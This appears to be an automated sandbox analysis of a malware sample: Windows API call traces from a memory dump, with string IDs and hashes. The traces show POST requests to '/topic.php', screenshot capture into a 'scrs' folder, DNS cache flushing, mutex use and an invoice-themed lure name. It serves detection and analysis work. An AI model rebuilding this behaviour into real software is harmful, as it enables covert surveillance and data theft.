                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C10,76F93050,76F930D0,76F93080), ref: 02BC50B7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC50BA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC50CE
                                                                                                                                                                                                            • inet_addr.WS2_32(?), ref: 02BC50F5
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BC5113
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC511D
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC5120
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC512D
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC5130
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000C13), ref: 02BC5148
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC514F
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC515F
                                                                                                                                                                                                            • GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02BC5175
                                                                                                                                                                                                            • htons.WS2_32(00000000), ref: 02BC51A1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02BC51D1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC51D4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000C00), ref: 02BC51E4
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC51E7
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocFreeTableValidatememset$htonsinet_addr
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1718479325-0
                                                                                                                                                                                                            • Opcode ID: 7fbbbcc82e655ac9a0f5af17e6bf3b9d1fa1f05d285992afc5f7f6fe9c144567
                                                                                                                                                                                                            • Instruction ID: 6e514c3344c575edd749ffb42520ed2c35e8343a5d71cc48deea61e86315ee8d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fbbbcc82e655ac9a0f5af17e6bf3b9d1fa1f05d285992afc5f7f6fe9c144567
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9441C372A40304ABDB309F65DC4CF9E7B68EF44790FA58658FA45A7280DB71E580CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC5250
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BC527C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,0000001C,0000001C), ref: 02BC52A3
                                                                                                                                                                                                            • IsBadReadPtr.KERNEL32(?,00000005), ref: 02BC52D4
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02BC52FD
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,Content-Length: ), ref: 02BC5315
                                                                                                                                                                                                            • StrToIntA.SHLWAPI(-00000010), ref: 02BC5323
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 02BC5355
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$Readmemcpystrstr
                                                                                                                                                                                                            • String ID: $Content-Length: $POST
                                                                                                                                                                                                            • API String ID: 2509092961-2076583852
                                                                                                                                                                                                            • Opcode ID: e7972b1d942e5c31f1ab25a471a792741f0cbfed0ee84b78b5b9b20dcb130159
                                                                                                                                                                                                            • Instruction ID: 2093565485bbcdd62a37dcd30fffe1f093fe504661ac3e54558abb05b9390df4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7972b1d942e5c31f1ab25a471a792741f0cbfed0ee84b78b5b9b20dcb130159
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C717F71D40309AFDB20CFA8D884BAEBBF5FB48704B58866DE606E7244D770A905CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC3821
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC383C
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,?,?,?,76F90F00,00000000,00000000), ref: 02BC3856
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?,?,?,?,76F90F00,00000000,00000000), ref: 02BC386C
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CA1
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6CBF
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?,?,?,?,?,?,00000000), ref: 02BB6CDB
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegQueryValueExA.KERNEL32(?,698896B4a,00000000,00000001,?,00000104,?,?,?,?,?,00000000), ref: 02BB6D02
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: GetProcessHeap.KERNEL32(00000008,00000110,?,?,?,?,?,?,?,00000000), ref: 02BB6D7A
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 02BB6D81
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: memset.MSVCRT ref: 02BB6D95
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 02BB6DAE
                                                                                                                                                                                                              • Part of subcall function 02BB6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 02BB6DBC
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC38BB
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC38C2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC38CE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC38D5
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000000,00000000,/topic.php,?,00000001,00000001,00000001,00000000,00000001,?,?,?,76F90F00), ref: 02BC394D
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,?,?,76F90F00,00000000,00000000), ref: 02BC395A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC3998
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC399B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC39A7
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,76F90F00,00000000,00000000), ref: 02BC39AA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                            • String ID: /topic.php
                                                                                                                                                                                                            • API String ID: 870369024-224703247
                                                                                                                                                                                                            • Opcode ID: 368674dc9ac388132e059820135351534e13c1b80728acdff01b13f15dfa5999
                                                                                                                                                                                                            • Instruction ID: 26365d6943e4f01155cc054d040b91784f609f369db0af8e6a5ed619f49a38f8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 368674dc9ac388132e059820135351534e13c1b80728acdff01b13f15dfa5999
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 365117B29441186BCB349B749C88EEBBBBCEB44300F9489DDF756D7140D7B19D848BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BB833C
                                                                                                                                                                                                            • GetThreadDesktop.USER32(00000000,?,?,02BB8212,00000000,00000000), ref: 02BB8343
                                                                                                                                                                                                            • SetThreadDesktop.USER32(00000000,?,?,02BB8212,00000000,00000000), ref: 02BB834F
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: GetTickCount.KERNEL32 ref: 02BBDA2D
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 02BBDA3E
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02BFF5A0), ref: 02BBDA6A
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDA83
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02BFF54C), ref: 02BBDAB0
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 02BBDAC3
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: CreateMutexA.KERNEL32(00000000,00000000,02BFF670), ref: 02BBDAE1
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BBDAFF
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?), ref: 02BBDB20
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: SetNamedSecurityInfoA.ADVAPI32(02BFF670,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02BBDB3D
                                                                                                                                                                                                              • Part of subcall function 02BBDA20: LocalFree.KERNEL32(00000000), ref: 02BBDB47
                                                                                                                                                                                                              • Part of subcall function 02BBDC50: memset.MSVCRT ref: 02BBDC69
                                                                                                                                                                                                              • Part of subcall function 02BBDC50: GetVersionExA.KERNEL32(?,?,00000000,?), ref: 02BBDC82
                                                                                                                                                                                                              • Part of subcall function 02BD9F50: malloc.MSVCRT ref: 02BD9F62
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,00000008), ref: 02BB83E7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,00000008,00000005), ref: 02BB83F5
                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,fuck), ref: 02BB83FF
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: IsNetworkAlive.SENSAPI(02BB6E0D,00000000), ref: 02BC4F93
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: IsUserAnAdmin.SHELL32 ref: 02BC4FA1
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: DnsFlushResolverCache.DNSAPI ref: 02BC4FAB
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC4FC8
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,76F90F10), ref: 02BC4FE7
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02BC5000
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5013
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: memset.MSVCRT ref: 02BC502C
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,76F90F10), ref: 02BC5045
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02BC5058
                                                                                                                                                                                                              • Part of subcall function 02BC4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02BC5065
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000,?,00000000), ref: 02BB84A2
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02BB84B1
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 02BB84E0
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB84EF
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BB84FD
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 02BB8506
                                                                                                                                                                                                            • Sleep.KERNEL32(00002710,?,00000000), ref: 02BB854C
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateFileObjectSecuritySingleWait$DescriptorHeapThreadmemset$AllocCheckConnectionDesktopInternetMappingMutexViewlstrcpyn$AdminAliveCacheConvertCountCurrentEventFlushFreeInfoLocalNamedNetworkReleaseResolverSaclSleepStringTickUserVersionlstrcpymalloc
                                                                                                                                                                                                            • String ID: SYSTEM!899552!F2AA6EC3$fuck
                                                                                                                                                                                                            • API String ID: 379441473-274505873
                                                                                                                                                                                                            • Opcode ID: e53eb069a7a082009e30a4626ed9f4b359bad726e661ad0a455c023ffe9c75a1
                                                                                                                                                                                                            • Instruction ID: 9200360f6d42992ab1240cb64c26fc71e4e4743ce43689578d6a31305b38b746
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e53eb069a7a082009e30a4626ed9f4b359bad726e661ad0a455c023ffe9c75a1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6051B2759403419FD7619F68D888FF63BE9EF44354F094AE9E6584B2A2C7B0E814CF60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CD8C), ref: 02BD23B7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD23F9
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD2405
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD2409
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD241A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD2421
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD2452
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD2458
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD245C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD246D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD2474
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD24A2
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02BD24B8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                            • API String ID: 224938940-1670482240
                                                                                                                                                                                                            • Opcode ID: dfacdbbcc2eccd2ea160e27d87f067054c2f8a7842d6c73f2420494752e6cdc1
                                                                                                                                                                                                            • Instruction ID: 039b84eca5393c7aaa50577c57f38712708685db3ee5709faa95087eac17814f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfacdbbcc2eccd2ea160e27d87f067054c2f8a7842d6c73f2420494752e6cdc1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 163138319442595BDB60DB789C58BEABBE8EF55740F8884D4EEC5D3101EBB0E984CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CA80), ref: 02BD1347
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD1389
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD1395
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD1399
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD13AA
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD13B1
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD13E2
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD13E8
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD13EC
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD13FD
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD1404
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD1432
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02BD1448
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                            • API String ID: 224938940-1670482240
                                                                                                                                                                                                            • Opcode ID: 4707df7decdf4dfd182ea2edda2a6c30bd76c0bf00f63c2df79c78406db0fd36
                                                                                                                                                                                                            • Instruction ID: 5ca896b11fe54b8ab98e8da4e254acc1cd6c460cbf46334fcef58177eadb7f82
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4707df7decdf4dfd182ea2edda2a6c30bd76c0bf00f63c2df79c78406db0fd36
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15312C319442195BDB60DB7D9C58BEABBE8EF55750F8884D4EA89D3100EB70E984CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CF94), ref: 02BD3367
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD33A9
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD33B5
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD33B9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD33CA
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD33D1
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3402
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD3408
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD340C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD341D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD3424
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD3452
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02BD3468
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                            • API String ID: 224938940-1670482240
                                                                                                                                                                                                            • Opcode ID: c15e5511e859401d25e6631d175e4b2da8747cc5d67360cb9e334550117e9a99
                                                                                                                                                                                                            • Instruction ID: b5a1ed7bc9656a71c23918afc14a0d9986feb95407b449470bb09fea83ea2b8d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c15e5511e859401d25e6631d175e4b2da8747cc5d67360cb9e334550117e9a99
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E314C319442185BCB60DB789C58BEABBE8EF55750F8884D4EAC5D3101EFB0E984CFA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90), ref: 02BD30A7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD30E9
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD30F5
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD30F9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD310A
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD3111
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3142
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD3148
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD314C
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD315D
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD3164
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BD3192
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02BD31A8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                            • API String ID: 224938940-1670482240
                                                                                                                                                                                                            • Opcode ID: d2e37bfec8bb2865c3cc942a4fee4a0bbfe2d655ddaa19dba9c7fcd3b1802831
                                                                                                                                                                                                            • Instruction ID: c7de85fa62b177ae635585667fc570b96f4bf437418619f4dfdcad7e4658cb19
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2e37bfec8bb2865c3cc942a4fee4a0bbfe2d655ddaa19dba9c7fcd3b1802831
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F316931D402195BCB60CB789C58BEABBE8EF55740F8848D4EA85D3101EBB0E9C4CFA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02BCF6BC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCF6D2
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}), ref: 02BCF6E0
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCF6E9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BCF707
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCF715
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02BCF2D0,00000000,00000000,00000000), ref: 02BCF72A
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40), ref: 02BCF73B
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BCF740
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BCF754
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCF762
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C670), ref: 02BCF76D
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C670,FAKTURA), ref: 02BCF787
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$MutexSleep$CloseInformationOpen$BackslashCreateObjectPathReleaseSingleThreadWait
                                                                                                                                                                                                            • String ID: FAKTURA$Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
                                                                                                                                                                                                            • API String ID: 2736094147-4104618384
                                                                                                                                                                                                            • Opcode ID: 3642cebb1361988ef6ae30c9e7b15459d497649247ef3b7aeb694b604cb9991c
                                                                                                                                                                                                            • Instruction ID: 35b964b49a0cb5f1a467eff86816a43557f6a8c7bead5e80d87f1421fe43ad4d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3642cebb1361988ef6ae30c9e7b15459d497649247ef3b7aeb694b604cb9991c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1212931AC53113AF230AB689C06F6E73999F04B61F60879AFB84671C08BB0A4008BB5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02BBA25E
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindowLongA.USER32(02BBCE3A,000000F0), ref: 02BBE26B
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetLastActivePopup.USER32(02BBCE3A), ref: 02BBE279
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000005), ref: 02BBE293
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindow.USER32(00000000), ref: 02BBE296
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindowInfo.USER32(00000000,?), ref: 02BBE2AC
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000004), ref: 02BBE2B5
                                                                                                                                                                                                              • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000003), ref: 02BBE2EE
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02BBA29F
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002,00000000), ref: 02BBA325
